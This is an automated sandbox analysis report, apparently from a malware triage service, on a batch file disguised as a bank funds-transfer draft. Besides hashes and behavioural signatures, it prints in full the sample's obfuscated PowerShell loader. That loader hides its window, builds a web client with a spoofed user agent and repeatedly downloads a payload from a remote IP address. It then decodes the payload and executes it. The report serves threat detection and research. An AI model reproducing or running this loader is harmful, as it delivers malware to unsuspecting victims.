Analysis
-
max time kernel
298s -
max time network
293s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
10/06/2024, 16:26
Static task
static1
Behavioral task
behavioral1
Sample
CBQ Funds transfer DraftUdkikspostens44.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
CBQ Funds transfer DraftUdkikspostens44.bat
Resource
win11-20240508-en
General
-
Target
CBQ Funds transfer DraftUdkikspostens44.bat
-
Size
6KB
-
MD5
84cb66117acd5104ada1321c3b472f94
-
SHA1
ee6ca999a1798296139fc0eddca01b10d955e00d
-
SHA256
7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9
-
SHA512
483f0f275710dfceef0af0da3ddf3b72a52a80ab788d31fca647e3a28d585f1feedffad182baa9b1ba70e32b8e671c6823b74352db950ad27fd3f3d71ced349e
-
SSDEEP
192:Fk33ynxcIG+cPPX99/PdQ9LXJICyD+QRK:FkSmtnN5FQpJJ
Malware Config
Signatures
-
Blocklisted process makes network request 12 IoCs
flow pid Process 2 3924 powershell.exe 7 3924 powershell.exe 13 3924 powershell.exe 14 3924 powershell.exe 16 3924 powershell.exe 17 3924 powershell.exe 19 3924 powershell.exe 21 3924 powershell.exe 23 3924 powershell.exe 24 3924 powershell.exe 26 3924 powershell.exe 27 3924 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3924 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3924 powershell.exe 3924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3924 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4920 wrote to memory of 3924 4920 cmd.exe 81 PID 4920 wrote to memory of 3924 4920 cmd.exe 81 PID 3924 wrote to memory of 976 3924 powershell.exe 83 PID 3924 wrote to memory of 976 3924 powershell.exe 83
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. ';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne '.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"3⤵PID:976
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82